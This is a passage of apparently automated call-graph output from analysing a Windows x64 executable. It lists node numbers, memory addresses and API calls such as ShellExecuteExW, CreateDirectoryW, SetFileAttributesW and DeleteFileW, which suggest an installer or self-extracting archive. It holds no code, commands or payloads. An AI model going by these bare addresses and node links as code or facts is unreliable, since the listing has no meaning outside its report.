7ff6e7e3db70 26975->26976 26977 7ff6e7e3db55 MoveFileExW 26975->26977 26976->26927 26978 7ff6e7e11fa0 31 API calls 26976->26978 26977->26976 26978->26976 26979->26927 26980->26927 26981->26927 26983->26927 26984->26927 26986 7ff6e7e3f9a3 26985->26986 26987 7ff6e7e120b0 33 API calls 26986->26987 26988 7ff6e7e3f9b9 26987->26988 26989 7ff6e7e3f9ee 26988->26989 26990 7ff6e7e120b0 33 API calls 26988->26990 27306 7ff6e7e1e34c 26989->27306 26990->26989 26992 7ff6e7e3fa4b 27326 7ff6e7e1e7a8 26992->27326 26996 7ff6e7e3fa61 26997 7ff6e7e42320 _handle_error 8 API calls 26996->26997 26998 7ff6e7e3bc52 26997->26998 26998->26641 27001 7ff6e7e3849c 4 API calls 27000->27001 27002 7ff6e7e3f3bf 27001->27002 27003 7ff6e7e3f4b7 27002->27003 27004 7ff6e7e3f3c7 GetWindow 27002->27004 27005 7ff6e7e42320 _handle_error 8 API calls 27003->27005 27011 7ff6e7e3f3e2 27004->27011 27006 7ff6e7e3be9b 27005->27006 27006->26405 27006->26406 27007 7ff6e7e3f3ee GetClassNameW 28407 7ff6e7e313c4 CompareStringW 27007->28407 27009 7ff6e7e3f417 GetWindowLongPtrW 27010 7ff6e7e3f496 GetWindow 27009->27010 27012 7ff6e7e3f429 IsDlgButtonChecked 27009->27012 27010->27003 27010->27011 27011->27003 27011->27007 27011->27009 27011->27010 27012->27010 27013 7ff6e7e3f445 GetObjectW 27012->27013 28408 7ff6e7e38504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27013->28408 27015 7ff6e7e3f461 27016 7ff6e7e384cc 4 API calls 27015->27016 28409 7ff6e7e38df4 16 API calls _handle_error 27015->28409 27016->27015 27018 7ff6e7e3f479 IsDlgButtonChecked DeleteObject 27018->27010 27020 7ff6e7e12527 27019->27020 27021 7ff6e7e1252a SetDlgItemTextW 27019->27021 27020->27021 27022 7ff6e7e7e2e0 27021->27022 27023->26426 27024->26491 27026 7ff6e7e232bc 51 API calls 27025->27026 27027 7ff6e7e232b1 27026->27027 27027->26503 27027->26526 27028->26503 27029->26584 27030->26611 27031->26623 27032->26633 27033->26639 27034->26648 27036 7ff6e7e43620 27035->27036 27036->26652 27037->26566 27039 7ff6e7e11177 27038->27039 27040 7ff6e7e12034 33 API calls 27039->27040 27041 7ff6e7e11185 BuildCatchObjectHelperInternal 27040->27041 27041->26582 27042->26609 27043->26673 27044->26698 27045->26713 27046->26725 27048 7ff6e7e23e28 swprintf 46 API calls 27047->27048 27049 7ff6e7e2a509 27048->27049 27050 7ff6e7e30f68 WideCharToMultiByte 27049->27050 27052 7ff6e7e2a519 27050->27052 27051 7ff6e7e2a589 27072 7ff6e7e29408 27051->27072 27052->27051 27064 7ff6e7e29800 31 API calls 27052->27064 27069 7ff6e7e2a56a SetDlgItemTextW 27052->27069 27055 7ff6e7e2a6f2 GetSystemMetrics GetWindow 27057 7ff6e7e2a821 27055->27057 27070 7ff6e7e2a71d 27055->27070 27056 7ff6e7e2a603 27058 7ff6e7e2a60c GetWindowLongPtrW 27056->27058 27059 7ff6e7e2a6c2 27056->27059 27060 7ff6e7e42320 _handle_error 8 API calls 27057->27060 27061 7ff6e7e7e2c0 27058->27061 27087 7ff6e7e295a8 27059->27087 27065 7ff6e7e2a830 27060->27065 27066 7ff6e7e2a6aa GetWindowRect 27061->27066 27064->27052 27065->26738 27066->27059 27067 7ff6e7e2a6e5 SetDlgItemTextW 27067->27055 27068 7ff6e7e2a73e GetWindowRect 27068->27070 27069->27052 27070->27057 27070->27068 27071 7ff6e7e2a800 GetWindow 27070->27071 27071->27057 27071->27070 27073 7ff6e7e295a8 47 API calls 27072->27073 27075 7ff6e7e2944f 27073->27075 27074 7ff6e7e42320 _handle_error 8 API calls 27076 7ff6e7e2958e GetWindowRect GetClientRect 27074->27076 27077 7ff6e7e1129c 33 API calls 27075->27077 27086 7ff6e7e2955a 27075->27086 27076->27055 27076->27056 27078 7ff6e7e2949c 27077->27078 27079 7ff6e7e295a1 27078->27079 27081 7ff6e7e1129c 33 API calls 27078->27081 27080 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27079->27080 27082 7ff6e7e295a7 27080->27082 27083 7ff6e7e29514 27081->27083 27084 7ff6e7e2959c 27083->27084 27083->27086 27085 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27084->27085 27085->27079 27086->27074 27088 7ff6e7e23e28 swprintf 46 API calls 27087->27088 27089 7ff6e7e295eb 27088->27089 27090 7ff6e7e30f68 WideCharToMultiByte 27089->27090 27091 7ff6e7e29603 27090->27091 27092 7ff6e7e29800 31 API calls 27091->27092 27093 7ff6e7e2961b 27092->27093 27094 7ff6e7e42320 _handle_error 8 API calls 27093->27094 27095 7ff6e7e2962b 27094->27095 27095->27055 27095->27067 27097 7ff6e7e113a4 33 API calls 27096->27097 27098 7ff6e7e12462 GetWindowTextW 27097->27098 27099 7ff6e7e12494 27098->27099 27100 7ff6e7e1129c 33 API calls 27099->27100 27101 7ff6e7e124a2 27100->27101 27102 7ff6e7e124dd 27101->27102 27104 7ff6e7e12505 27101->27104 27103 7ff6e7e42320 _handle_error 8 API calls 27102->27103 27105 7ff6e7e124f3 27103->27105 27106 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27104->27106 27105->26747 27107 7ff6e7e1250a 27106->27107 27108->26764 27110->26772 27112 7ff6e7e3ae3c GetMessageW 27111->27112 27113 7ff6e7e3ae80 GetDlgItem 27111->27113 27114 7ff6e7e3ae5b IsDialogMessageW 27112->27114 27115 7ff6e7e3ae6a TranslateMessage DispatchMessageW 27112->27115 27113->26783 27113->26784 27114->27113 27114->27115 27115->27113 27118 7ff6e7e236b3 27116->27118 27117 7ff6e7e236e0 27119 7ff6e7e232bc 51 API calls 27117->27119 27118->27117 27120 7ff6e7e236cc CreateDirectoryW 27118->27120 27121 7ff6e7e236ee 27119->27121 27120->27117 27122 7ff6e7e2377d 27120->27122 27123 7ff6e7e23791 GetLastError 27121->27123 27125 7ff6e7e26a0c 49 API calls 27121->27125 27124 7ff6e7e2378d 27122->27124 27136 7ff6e7e23d34 27122->27136 27123->27124 27127 7ff6e7e42320 _handle_error 8 API calls 27124->27127 27128 7ff6e7e2371c 27125->27128 27129 7ff6e7e237b9 27127->27129 27130 7ff6e7e2373b 27128->27130 27131 7ff6e7e23720 CreateDirectoryW 27128->27131 27129->26802 27132 7ff6e7e23774 27130->27132 27133 7ff6e7e237ce 27130->27133 27131->27130 27132->27122 27132->27123 27134 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27133->27134 27135 7ff6e7e237d3 27134->27135 27137 7ff6e7e23d5b 27136->27137 27138 7ff6e7e23d5e SetFileAttributesW 27136->27138 27137->27138 27139 7ff6e7e23d74 27138->27139 27146 7ff6e7e23df5 27138->27146 27140 7ff6e7e26a0c 49 API calls 27139->27140 27142 7ff6e7e23d99 27140->27142 27141 7ff6e7e42320 _handle_error 8 API calls 27143 7ff6e7e23e0a 27141->27143 27144 7ff6e7e23d9d SetFileAttributesW 27142->27144 27145 7ff6e7e23dbc 27142->27145 27143->27124 27144->27145 27145->27146 27147 7ff6e7e23e1a 27145->27147 27146->27141 27148 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27147->27148 27149 7ff6e7e23e1f 27148->27149 27151 7ff6e7e17206 27150->27151 27152 7ff6e7e1713b 27150->27152 27160 7ff6e7e1704c 47 API calls BuildCatchObjectHelperInternal 27151->27160 27158 7ff6e7e1714b BuildCatchObjectHelperInternal 27152->27158 27159 7ff6e7e13f48 33 API calls 2 library calls 27152->27159 27155 7ff6e7e1720b 27156 7ff6e7e17273 27155->27156 27161 7ff6e7e1889c 8 API calls BuildCatchObjectHelperInternal 27155->27161 27156->26818 27158->26818 27159->27158 27160->27155 27161->27155 27163 7ff6e7e3aa2f 27162->27163 27164 7ff6e7e3aa36 27162->27164 27163->26927 27164->27163 27294 7ff6e7e11744 33 API calls 4 library calls 27164->27294 27166->26927 27168 7ff6e7e3a47f 27167->27168 27189 7ff6e7e3a706 27167->27189 27295 7ff6e7e3cdf8 33 API calls 27168->27295 27170 7ff6e7e42320 _handle_error 8 API calls 27172 7ff6e7e3a717 27170->27172 27171 7ff6e7e3a49e 27173 7ff6e7e1129c 33 API calls 27171->27173 27172->26913 27174 7ff6e7e3a4de 27173->27174 27175 7ff6e7e1129c 33 API calls 27174->27175 27176 7ff6e7e3a517 27175->27176 27177 7ff6e7e1129c 33 API calls 27176->27177 27178 7ff6e7e3a54a 27177->27178 27296 7ff6e7e3a834 33 API calls _invalid_parameter_noinfo_noreturn 27178->27296 27180 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27181 7ff6e7e3a73a 27180->27181 27182 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27181->27182 27184 7ff6e7e3a740 27182->27184 27183 7ff6e7e3a573 27183->27181 27183->27184 27185 7ff6e7e3a685 27183->27185 27187 7ff6e7e120b0 33 API calls 27183->27187 27195 7ff6e7e3a734 27183->27195 27186 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27184->27186 27188 7ff6e7e3a746 27185->27188 27185->27189 27190 7ff6e7e3a72f 27185->27190 27186->27188 27187->27185 27191 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27188->27191 27189->27170 27193 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27190->27193 27192 7ff6e7e3a74c 27191->27192 27194 7ff6e7e1255c 61 API calls 27192->27194 27193->27195 27196 7ff6e7e3a795 27194->27196 27195->27180 27197 7ff6e7e3a7b1 27196->27197 27198 7ff6e7e3a801 SetDlgItemTextW 27196->27198 27201 7ff6e7e3a7a1 27196->27201 27199 7ff6e7e42320 _handle_error 8 API calls 27197->27199 27198->27197 27200 7ff6e7e3a827 27199->27200 27200->26913 27201->27197 27204 7ff6e7e3a7ad 27201->27204 27297 7ff6e7e2bb00 102 API calls 27201->27297 27202 7ff6e7e3a7b7 EndDialog 27202->27197 27204->27197 27204->27202 27210 7ff6e7e3f529 __scrt_get_show_window_mode 27205->27210 27223 7ff6e7e3f87d 27205->27223 27206 7ff6e7e11fa0 31 API calls 27207 7ff6e7e3f89c 27206->27207 27208 7ff6e7e42320 _handle_error 8 API calls 27207->27208 27209 7ff6e7e3f8a8 27208->27209 27209->26905 27211 7ff6e7e3f684 27210->27211 27298 7ff6e7e313c4 CompareStringW 27210->27298 27213 7ff6e7e1129c 33 API calls 27211->27213 27214 7ff6e7e3f6c0 27213->27214 27215 7ff6e7e232a8 51 API calls 27214->27215 27216 7ff6e7e3f6ca 27215->27216 27217 7ff6e7e11fa0 31 API calls 27216->27217 27220 7ff6e7e3f6d5 27217->27220 27218 7ff6e7e3f742 ShellExecuteExW 27219 7ff6e7e3f846 27218->27219 27225 7ff6e7e3f755 27218->27225 27219->27223 27227 7ff6e7e3f8fb 27219->27227 27220->27218 27222 7ff6e7e1129c 33 API calls 27220->27222 27221 7ff6e7e3f78e 27300 7ff6e7e3fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27221->27300 27226 7ff6e7e3f717 27222->27226 27223->27206 27224 7ff6e7e3f7e3 CloseHandle 27230 7ff6e7e3f7f2 27224->27230 27236 7ff6e7e3f801 27224->27236 27225->27221 27225->27224 27232 7ff6e7e3f781 ShowWindow 27225->27232 27299 7ff6e7e25b60 53 API calls 2 library calls 27226->27299 27229 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27227->27229 27235 7ff6e7e3f900 27229->27235 27301 7ff6e7e313c4 CompareStringW 27230->27301 27232->27221 27234 7ff6e7e3f725 27238 7ff6e7e11fa0 31 API calls 27234->27238 27236->27219 27239 7ff6e7e3f837 ShowWindow 27236->27239 27237 7ff6e7e3f7a6 27237->27224 27241 7ff6e7e3f7b4 GetExitCodeProcess 27237->27241 27240 7ff6e7e3f72f 27238->27240 27239->27219 27240->27218 27241->27224 27242 7ff6e7e3f7c7 27241->27242 27242->27224 27243->26927 27244->26927 27245->26927 27246->26927 27247->26927 27248->26927 27249->26927 27250->26927 27251->26927 27252->26927 27254 7ff6e7e272ea 27253->27254 27302 7ff6e7e1b3a8 27254->27302 27257->26927 27259 7ff6e7e231e7 DeleteFileW 27258->27259 27260 7ff6e7e231e4 27258->27260 27261 7ff6e7e231fd 27259->27261 27268 7ff6e7e2327c 27259->27268 27260->27259 27262 7ff6e7e26a0c 49 API calls 27261->27262 27264 7ff6e7e23222 27262->27264 27263 7ff6e7e42320 _handle_error 8 API calls 27265 7ff6e7e23291 27263->27265 27266 7ff6e7e23226 DeleteFileW 27264->27266 27267 7ff6e7e23243 27264->27267 27265->26927 27266->27267 27267->27268 27269 7ff6e7e232a1 27267->27269 27268->27263 27270 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27269->27270 27271 7ff6e7e232a6 27270->27271 27273->26927 27274->26927 27275->26927 27276->26927 27277->26927 27278->26927 27280 7ff6e7e2d25e 27279->27280 27281 7ff6e7e2d292 27280->27281 27282 7ff6e7e11744 33 API calls 27280->27282 27281->26973 27282->27280 27283->26873 27284->26861 27286->26843 27287->26846 27288->26848 27289->26928 27290->26889 27292->26891 27294->27164 27295->27171 27296->27183 27297->27204 27298->27211 27299->27234 27300->27237 27301->27236 27305 7ff6e7e1b3f2 __scrt_get_show_window_mode 27302->27305 27303 7ff6e7e42320 _handle_error 8 API calls 27304 7ff6e7e1b4b6 27303->27304 27304->26927 27305->27303 27362 7ff6e7e286ec 27306->27362 27308 7ff6e7e1e3c4 27368 7ff6e7e1e600 27308->27368 27310 7ff6e7e1e454 27312 7ff6e7e1e549 27310->27312 27314 7ff6e7e1e4d4 27310->27314 27311 7ff6e7e421d0 33 API calls 27315 7ff6e7e1e4f0 27311->27315 27313 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27312->27313 27323 7ff6e7e1e54e 27313->27323 27314->27311 27374 7ff6e7e33148 102 API calls 27315->27374 27317 7ff6e7e1e51d 27318 7ff6e7e42320 _handle_error 8 API calls 27317->27318 27320 7ff6e7e1e52d 27318->27320 27319 7ff6e7e218c2 27321 7ff6e7e2190d 27319->27321 27324 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27319->27324 27320->26992 27321->26992 27322 7ff6e7e11fa0 31 API calls 27322->27323 27323->27319 27323->27321 27323->27322 27325 7ff6e7e2193b 27324->27325 27327 7ff6e7e1e7ea 27326->27327 27328 7ff6e7e1e864 27327->27328 27330 7ff6e7e1e8a1 27327->27330 27375 7ff6e7e23ec8 27327->27375 27328->27330 27331 7ff6e7e1e993 27328->27331 27337 7ff6e7e1e900 27330->27337 27382 7ff6e7e1f578 27330->27382 27332 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27331->27332 27335 7ff6e7e1e998 27332->27335 27334 7ff6e7e42320 _handle_error 8 API calls 27336 7ff6e7e1e97e 27334->27336 27340 7ff6e7e1e578 27336->27340 27339 7ff6e7e1e955 27337->27339 27418 7ff6e7e128a4 82 API calls 2 library calls 27337->27418 27339->27334 28393 7ff6e7e215d8 27340->28393 27343 7ff6e7e1e59e 27344 7ff6e7e11fa0 31 API calls 27343->27344 27346 7ff6e7e1e5b7 27344->27346 27345 7ff6e7e31870 108 API calls 27345->27343 27347 7ff6e7e11fa0 31 API calls 27346->27347 27348 7ff6e7e1e5c3 27347->27348 27349 7ff6e7e11fa0 31 API calls 27348->27349 27350 7ff6e7e1e5cf 27349->27350 27351 7ff6e7e2878c 108 API calls 27350->27351 27352 7ff6e7e1e5db 27351->27352 27353 7ff6e7e11fa0 31 API calls 27352->27353 27354 7ff6e7e1e5e4 27353->27354 27355 7ff6e7e11fa0 31 API calls 27354->27355 27359 7ff6e7e1e5ed 27355->27359 27356 7ff6e7e218c2 27357 7ff6e7e2190d 27356->27357 27360 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27356->27360 27357->26996 27358 7ff6e7e11fa0 31 API calls 27358->27359 27359->27356 27359->27357 27359->27358 27361 7ff6e7e2193b 27360->27361 27363 7ff6e7e2870a 27362->27363 27364 7ff6e7e421d0 33 API calls 27363->27364 27365 7ff6e7e2872f 27364->27365 27366 7ff6e7e421d0 33 API calls 27365->27366 27367 7ff6e7e28759 27366->27367 27367->27308 27369 7ff6e7e1e627 27368->27369 27370 7ff6e7e1e62c BuildCatchObjectHelperInternal 27368->27370 27372 7ff6e7e11fa0 31 API calls 27369->27372 27371 7ff6e7e1e668 BuildCatchObjectHelperInternal 27370->27371 27373 7ff6e7e11fa0 31 API calls 27370->27373 27371->27310 27372->27370 27373->27371 27374->27317 27376 7ff6e7e272cc 8 API calls 27375->27376 27377 7ff6e7e23ee1 27376->27377 27378 7ff6e7e23f0f 27377->27378 27419 7ff6e7e240bc 27377->27419 27378->27327 27381 7ff6e7e23efa FindClose 27381->27378 27383 7ff6e7e1f598 _snwprintf 27382->27383 27445 7ff6e7e12950 27383->27445 27386 7ff6e7e1f5cc 27390 7ff6e7e1f5fc 27386->27390 27460 7ff6e7e133e4 27386->27460 27389 7ff6e7e1f5f8 27389->27390 27492 7ff6e7e13ad8 27389->27492 27711 7ff6e7e12c54 27390->27711 27397 7ff6e7e1f7cb 27502 7ff6e7e1f8a4 27397->27502 27399 7ff6e7e18d04 33 API calls 27400 7ff6e7e1f662 27399->27400 27731 7ff6e7e27918 48 API calls 2 library calls 27400->27731 27402 7ff6e7e1f677 27403 7ff6e7e23ec8 55 API calls 27402->27403 27412 7ff6e7e1f6ad 27403->27412 27405 7ff6e7e1f842 27405->27390 27523 7ff6e7e169f8 27405->27523 27534 7ff6e7e1f930 27405->27534 27410 7ff6e7e1f74d 27410->27397 27411 7ff6e7e1f89a 27410->27411 27413 7ff6e7e1f895 27410->27413 27415 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27411->27415 27412->27410 27412->27411 27414 7ff6e7e23ec8 55 API calls 27412->27414 27732 7ff6e7e27918 48 API calls 2 library calls 27412->27732 27417 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27413->27417 27414->27412 27416 7ff6e7e1f8a0 27415->27416 27417->27411 27418->27339 27420 7ff6e7e240f9 FindFirstFileW 27419->27420 27421 7ff6e7e241d2 FindNextFileW 27419->27421 27424 7ff6e7e241f3 27420->27424 27425 7ff6e7e2411e 27420->27425 27423 7ff6e7e241e1 GetLastError 27421->27423 27421->27424 27444 7ff6e7e241c0 27423->27444 27426 7ff6e7e24211 27424->27426 27430 7ff6e7e120b0 33 API calls 27424->27430 27427 7ff6e7e26a0c 49 API calls 27425->27427 27432 7ff6e7e1129c 33 API calls 27426->27432 27429 7ff6e7e24144 27427->27429 27428 7ff6e7e42320 _handle_error 8 API calls 27431 7ff6e7e23ef4 27428->27431 27433 7ff6e7e24167 27429->27433 27434 7ff6e7e24148 FindFirstFileW 27429->27434 27430->27426 27431->27378 27431->27381 27435 7ff6e7e2423b 27432->27435 27433->27424 27437 7ff6e7e241af GetLastError 27433->27437 27438 7ff6e7e24314 27433->27438 27434->27433 27436 7ff6e7e28090 47 API calls 27435->27436 27439 7ff6e7e24249 27436->27439 27437->27444 27440 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27438->27440 27442 7ff6e7e2430f 27439->27442 27439->27444 27441 7ff6e7e2431a 27440->27441 27443 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27442->27443 27443->27438 27444->27428 27446 7ff6e7e1296c 27445->27446 27447 7ff6e7e286ec 33 API calls 27446->27447 27448 7ff6e7e1298d 27447->27448 27449 7ff6e7e12ac2 27448->27449 27450 7ff6e7e421d0 33 API calls 27448->27450 27733 7ff6e7e24d04 27449->27733 27452 7ff6e7e12ab0 27450->27452 27452->27449 27454 7ff6e7e191c8 35 API calls 27452->27454 27454->27449 27455 7ff6e7e22ca8 27459 7ff6e7e224c0 54 API calls 27455->27459 27456 7ff6e7e22cc1 27458 7ff6e7e22cc5 27456->27458 27747 7ff6e7e1b7e8 99 API calls 2 library calls 27456->27747 27458->27386 27459->27456 27486 7ff6e7e228d0 104 API calls 27460->27486 27461 7ff6e7e1344e 27462 7ff6e7e13674 27461->27462 27468 7ff6e7e13682 27461->27468 27748 7ff6e7e128a4 82 API calls 2 library calls 27462->27748 27463 7ff6e7e13431 __scrt_get_show_window_mode 27463->27461 27465 7ff6e7e13601 27463->27465 27483 7ff6e7e22bb0 101 API calls 27463->27483 27465->27389 27466 7ff6e7e169f8 141 API calls 27466->27468 27467 7ff6e7e134cc 27487 7ff6e7e228d0 104 API calls 27467->27487 27468->27465 27468->27466 27472 7ff6e7e1370c 27468->27472 27488 7ff6e7e22aa0 101 API calls 27468->27488 27469 7ff6e7e135cb 27469->27461 27470 7ff6e7e135d7 27469->27470 27470->27465 27474 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27470->27474 27471 7ff6e7e13740 27471->27465 27475 7ff6e7e1384d 27471->27475 27489 7ff6e7e22bb0 101 API calls 27471->27489 27472->27465 27472->27471 27749 7ff6e7e128a4 82 API calls 2 library calls 27472->27749 27477 7ff6e7e13891 27474->27477 27475->27465 27476 7ff6e7e120b0 33 API calls 27475->27476 27476->27465 27477->27389 27478 7ff6e7e134eb 27478->27469 27484 7ff6e7e22aa0 101 API calls 27478->27484 27479 7ff6e7e135a7 27479->27469 27490 7ff6e7e228d0 104 API calls 27479->27490 27480 7ff6e7e169f8 141 API calls 27481 7ff6e7e1378e 27480->27481 27481->27480 27482 7ff6e7e13803 27481->27482 27491 7ff6e7e22aa0 101 API calls 27481->27491 27485 7ff6e7e22aa0 101 API calls 27482->27485 27483->27467 27484->27479 27485->27475 27486->27463 27487->27478 27488->27468 27489->27481 27490->27469 27491->27481 27493 7ff6e7e13af9 27492->27493 27499 7ff6e7e13b55 27492->27499 27750 7ff6e7e13378 27493->27750 27495 7ff6e7e42320 _handle_error 8 API calls 27497 7ff6e7e13b67 27495->27497 27497->27397 27497->27399 27498 7ff6e7e13b6c 27500 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27498->27500 27499->27495 27501 7ff6e7e13b71 27500->27501 27977 7ff6e7e2886c 27502->27977 27504 7ff6e7e1f8ba 27981 7ff6e7e2ef60 GetSystemTime SystemTimeToFileTime 27504->27981 27507 7ff6e7e30994 27508 7ff6e7e40340 27507->27508 27509 7ff6e7e27df4 47 API calls 27508->27509 27510 7ff6e7e40373 27509->27510 27511 7ff6e7e2aae0 48 API calls 27510->27511 27512 7ff6e7e40387 27511->27512 27513 7ff6e7e2da98 48 API calls 27512->27513 27514 7ff6e7e40397 27513->27514 27515 7ff6e7e11fa0 31 API calls 27514->27515 27516 7ff6e7e403a2 27515->27516 27990 7ff6e7e3fc68 27516->27990 27524 7ff6e7e16a0a 27523->27524 27525 7ff6e7e16a0e 27523->27525 27524->27405 27533 7ff6e7e22bb0 101 API calls 27525->27533 27526 7ff6e7e16a1b 27527 7ff6e7e16a3e 27526->27527 27528 7ff6e7e16a2f 27526->27528 28085 7ff6e7e15130 130 API calls 2 library calls 27527->28085 27528->27524 28002 7ff6e7e15e24 27528->28002 27531 7ff6e7e16a3c 27531->27524 28086 7ff6e7e1466c 82 API calls 27531->28086 27533->27526 27535 7ff6e7e1f978 27534->27535 27538 7ff6e7e1f9b0 27535->27538 27595 7ff6e7e1fa34 27535->27595 28208 7ff6e7e3612c 146 API calls 3 library calls 27535->28208 27537 7ff6e7e21189 27539 7ff6e7e2118e 27537->27539 27540 7ff6e7e211e1 27537->27540 27538->27537 27545 7ff6e7e1f9d0 27538->27545 27538->27595 27539->27595 28256 7ff6e7e1dd08 179 API calls 27539->28256 27540->27595 28257 7ff6e7e3612c 146 API calls 3 library calls 27540->28257 27541 7ff6e7e42320 _handle_error 8 API calls 27542 7ff6e7e211c4 27541->27542 27542->27405 27545->27595 28123 7ff6e7e19bb0 27545->28123 27547 7ff6e7e1fad6 28136 7ff6e7e25ef8 27547->28136 27595->27541 27712 7ff6e7e12c74 27711->27712 27713 7ff6e7e12c88 27711->27713 27712->27713 28342 7ff6e7e12d80 27712->28342 27714 7ff6e7e11fa0 31 API calls 27713->27714 27717 7ff6e7e12ca1 27714->27717 27730 7ff6e7e12d64 27717->27730 28372 7ff6e7e13090 31 API calls _invalid_parameter_noinfo_noreturn 27717->28372 27718 7ff6e7e12d08 28373 7ff6e7e13090 31 API calls _invalid_parameter_noinfo_noreturn 27718->28373 27720 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27722 7ff6e7e12d7c 27720->27722 27721 7ff6e7e12d14 27723 7ff6e7e11fa0 31 API calls 27721->27723 27724 7ff6e7e12d20 27723->27724 28374 7ff6e7e2878c 27724->28374 27730->27720 27731->27402 27732->27412 27734 7ff6e7e24d32 __scrt_get_show_window_mode 27733->27734 27743 7ff6e7e24bac 27734->27743 27736 7ff6e7e24d90 27737 7ff6e7e42320 _handle_error 8 API calls 27736->27737 27740 7ff6e7e12b32 27737->27740 27738 7ff6e7e24d54 27738->27736 27739 7ff6e7e24dae 27738->27739 27741 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27739->27741 27740->27386 27740->27455 27742 7ff6e7e24db3 27741->27742 27744 7ff6e7e24c27 27743->27744 27746 7ff6e7e24c2f BuildCatchObjectHelperInternal 27743->27746 27745 7ff6e7e11fa0 31 API calls 27744->27745 27745->27746 27746->27738 27747->27458 27748->27465 27749->27471 27751 7ff6e7e13396 27750->27751 27752 7ff6e7e1339a 27750->27752 27751->27498 27751->27499 27756 7ff6e7e13294 27752->27756 27755 7ff6e7e22aa0 101 API calls 27755->27751 27757 7ff6e7e132bb 27756->27757 27759 7ff6e7e132f6 27756->27759 27758 7ff6e7e169f8 141 API calls 27757->27758 27762 7ff6e7e132db 27758->27762 27764 7ff6e7e16e74 27759->27764 27762->27755 27765 7ff6e7e16e95 27764->27765 27766 7ff6e7e169f8 141 API calls 27765->27766 27768 7ff6e7e1331d 27765->27768 27796 7ff6e7e2e808 27765->27796 27766->27765 27768->27762 27769 7ff6e7e13904 27768->27769 27804 7ff6e7e16a7c 27769->27804 27772 7ff6e7e1396a 27775 7ff6e7e13989 27772->27775 27776 7ff6e7e1399a 27772->27776 27773 7ff6e7e13a8a 27777 7ff6e7e42320 _handle_error 8 API calls 27773->27777 27837 7ff6e7e30d54 33 API calls 27775->27837 27781 7ff6e7e139ec 27776->27781 27782 7ff6e7e139a3 27776->27782 27780 7ff6e7e13a9e 27777->27780 27778 7ff6e7e13ab3 27783 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27778->27783 27780->27762 27839 7ff6e7e126b4 33 API calls BuildCatchObjectHelperInternal 27781->27839 27838 7ff6e7e30c80 33 API calls 27782->27838 27785 7ff6e7e13ab8 27783->27785 27791 7ff6e7e47904 _invalid_parameter_noinfo_noreturn 31 API calls 27785->27791 27786 7ff6e7e139b0 27788 7ff6e7e139c0 BuildCatchObjectHelperInternal 27786->27788 27792 7ff6e7e11fa0 31 API calls 27786->27792 27789 7ff6e7e11fa0 31 API calls 27788->27789 27795 7ff6e7e1394f 27789->27795 27790 7ff6e7e13a13 27840 7ff6e7e30ae8 34 API calls _invalid_parameter_noinfo_noreturn 27790->27840 27794 7ff6e7e13abe 27791->27794 27792->27788 27795->27773 27795->27778 27795->27785 27797 7ff6e7e2e811 27796->27797 27799 7ff6e7e2e82b 27797->27799 27802 7ff6e7e1b664 RtlPcToFileHeader RaiseException _com_raise_error 27797->27802 27800 7ff6e7e2e845 SetThreadExecutionState 27799->27800 27803 7ff6e7e1b664 RtlPcToFileHeader RaiseException _com_raise_error 27799->27803 27802->27799 27803->27800 27805 7ff6e7e16a96 _snwprintf 27804->27805 27806 7ff6e7e16ae4 27805->27806 27807 7ff6e7e16ac4 27805->27807 27809 7ff6e7e16d4d 27806->27809 27813 7ff6e7e16b0f 27806->27813 27879 7ff6e7e128a4 82 API calls 2 library calls 27807->27879 27908 7ff6e7e128a4 82 API calls 2 library calls 27809->27908 27810 7ff6e7e16ad0 27812 7ff6e7e42320 _handle_error 8 API calls 27810->27812 27814 7ff6e7e1394b 27812->27814 27813->27810 27841 7ff6e7e31f94 27813->27841 27814->27772 27814->27795 27836 7ff6e7e12794 33 API calls __std_swap_ranges_trivially_swappable 27814->27836 27817 7ff6e7e16b85 27820 7ff6e7e16c2a 27817->27820 27835 7ff6e7e16b7b 27817->27835 27885 7ff6e7e28968 109 API calls 27817->27885 27818 7ff6e7e16b6e 27880 7ff6e7e128a4 82 API calls 2 library calls 27818->27880 27819 7ff6e7e16b80 27819->27817 27881 7ff6e7e140b0 27819->27881 27850 7ff6e7e24760 27820->27850 27826 7ff6e7e16c52 27827 7ff6e7e16cc7 27826->27827 27828 7ff6e7e16cd1 27826->27828 27854 7ff6e7e21794 27827->27854 27886 7ff6e7e31f20 27828->27886 27869 7ff6e7e31870 27835->27869 27836->27772 27837->27795 27838->27786 27839->27790 27840->27795 27842 7ff6e7e32056 std::bad_alloc::bad_alloc 27841->27842 27843 7ff6e7e31fc5 std::bad_alloc::bad_alloc 27841->27843 27844 7ff6e7e44078 _com_raise_error 2 API calls 27842->27844 27845 7ff6e7e44078 _com_raise_error 2 API calls 27843->27845 27846 7ff6e7e3200f std::bad_alloc::bad_alloc 27843->27846 27847 7ff6e7e16b59 27843->27847 27844->27843 27845->27846 27846->27847 27848 7ff6e7e44078 _com_raise_error 2 API calls 27846->27848 27847->27817 27847->27818 27847->27819 27849 7ff6e7e320a9 27848->27849 27851 